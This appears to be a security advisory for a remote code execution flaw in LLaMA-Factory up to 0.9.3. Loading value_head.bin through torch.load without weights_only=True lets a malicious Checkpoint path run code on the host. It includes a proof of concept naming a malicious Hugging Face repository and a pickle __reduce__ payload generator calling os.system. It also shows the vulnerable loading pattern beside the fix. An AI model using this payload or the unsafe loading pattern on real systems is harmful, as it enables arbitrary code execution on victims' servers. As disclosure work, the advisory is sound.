Description
LLaMA-Factory allows Code Injection through improper vhead_file safeguards
Summary
A critical remote code execution vulnerability was discovered during the LLaMA Factory training process. This vulnerability arises because the `vhead_file` is loaded without proper safeguards, allowing malicious attackers to execute arbitrary code on the host system simply by passing a malicious `Checkpoint path` parameter through the WebUI interface. The attack is stealthy, as the victim remains unaware of the exploitation. The root cause is that the `vhead_file` argument is loaded without the secure parameter `weights_only=True`.
Note: In torch versions < 2.6, the default setting is `weights_only=False`, and LLaMA Factory's `setup.py` only requires `torch>=2.0.0`.
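The effect of this flag can be illustrated with the minimal sketch below; the file name `value_head.bin` is used purely for illustration.

```python
import torch

# On torch < 2.6 the default is weights_only=False, so torch.load() performs
# full pickle deserialization and any callable embedded in the file is
# executed on the host while the checkpoint is being loaded.
state_dict = torch.load("value_head.bin", map_location="cpu")

# With weights_only=True, torch uses a restricted unpickler that only rebuilds
# tensors and primitive containers; a crafted payload referencing arbitrary
# callables (e.g. os.system) raises pickle.UnpicklingError instead of running.
state_dict = torch.load("value_head.bin", map_location="cpu", weights_only=True)
```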
Affected Version
Llama Factory versions <=0.9.3 are affected by this vulnerability.
Details
- In LLaMA Factory's WebUI, when a user sets the `Checkpoint path`, it modifies the `adapter_name_or_path` parameter passed to the training process (code in `src/llamafactory/webui/runner.py`).
- The `adapter_name_or_path` passed to the training process is then used in `src/llamafactory/model/model_utils/valuehead.py` to fetch the corresponding `value_head.bin` file from Hugging Face. This file is subsequently loaded via `torch.load()` without the security parameter `weights_only=True` being set, resulting in remote code execution (code in `src/llamafactory/model/model_utils/valuehead.py`; a simplified sketch follows below).
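The snippet below is a simplified sketch of this pattern, not the project's verbatim code; the function name `load_value_head` and the use of `hf_hub_download` are illustrative assumptions.

```python
import torch
from huggingface_hub import hf_hub_download

def load_value_head(adapter_name_or_path: str, safe: bool = True) -> dict:
    # The Checkpoint path supplied through the WebUI ends up in
    # adapter_name_or_path and is used to pull value_head.bin from the Hub.
    vhead_file = hf_hub_download(repo_id=adapter_name_or_path,
                                 filename="value_head.bin")

    if not safe:
        # Vulnerable pattern: full pickle deserialization, so a crafted
        # value_head.bin executes arbitrary code on the host.
        return torch.load(vhead_file, map_location="cpu")

    # Hardened pattern: restrict deserialization to tensors and primitive
    # containers so a malicious payload fails to load instead of executing.
    return torch.load(vhead_file, map_location="cpu", weights_only=True)
```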
PoC
Steps to Reproduce
- Deploy LLaMA Factory.
- Remote attack through the WebUI interface:
  - Configure `Model name` and `Model path` correctly. For demonstration purposes, we'll use a small model `llamafactory/tiny-random-Llama-3` to accelerate model loading.
  - Set `Finetuning method` to `LoRA` and `Train Stage` to `Reward Modeling`. The vulnerability is specifically triggered during the Reward Modeling training stage.
  - Input a malicious Hugging Face path in `Checkpoint path`; here we use `paulinsider/llamafactory-hack`. This repository (https://huggingface.co/paulinsider/llamafactory-hack/tree/main) contains a malicious `value_head.bin` file. The generation method for this file is sketched after this list (it can execute arbitrary attack commands; for demonstration, we configured it to create a `HACKED!` folder).
  - Click `Start` to begin training. After a brief wait, a `HACKED!` folder will be created on the server. Note that arbitrary malicious code could be executed through this method.
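The following is a minimal sketch of how such a `value_head.bin` can be produced using the standard pickle `__reduce__` technique; it is not the exact file from the repository above, and the payload is limited to the benign `mkdir` command used in this demonstration.

```python
import os

import torch

class MaliciousPayload:
    def __reduce__(self):
        # The (callable, args) tuple returned here is invoked when the file is
        # unpickled, i.e. when torch.load() runs without weights_only=True.
        return (os.system, ("mkdir HACKED!",))

# Wrap the payload in an ordinary-looking checkpoint dict and save it as
# value_head.bin; uploading the file to a Hugging Face repository and pointing
# Checkpoint path at that repository reproduces the PoC.
torch.save({"payload": MaliciousPayload()}, "value_head.bin")
```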
The video demonstration of the vulnerability exploitation is available at the Google Drive link.
Impact
Exploitation of this vulnerability allows remote attackers to:
- Execute arbitrary malicious code / OS commands on the server.
- Potentially compromise sensitive data or escalate privileges.
- Deploy malware or create persistent backdoors in the system. This significantly increases the risk of data breaches and operational disruption.
Packages
llamafactory
<= 0.9.3
None
Related vulnerabilities
LLaMA-Factory is a tuning library for large language models. A remote code execution vulnerability was discovered in LLaMA-Factory versions up to and including 0.9.3 during the LLaMA-Factory training process. This vulnerability arises because the `vhead_file` is loaded without proper safeguards, allowing malicious attackers to execute arbitrary malicious code on the host system simply by passing a malicious `Checkpoint path` parameter through the `WebUI` interface. The attack is stealthy, as the victim remains unaware of the exploitation. The root cause is that the `vhead_file` argument is loaded without the secure parameter `weights_only=True`. Version 0.9.4 contains a fix for the issue.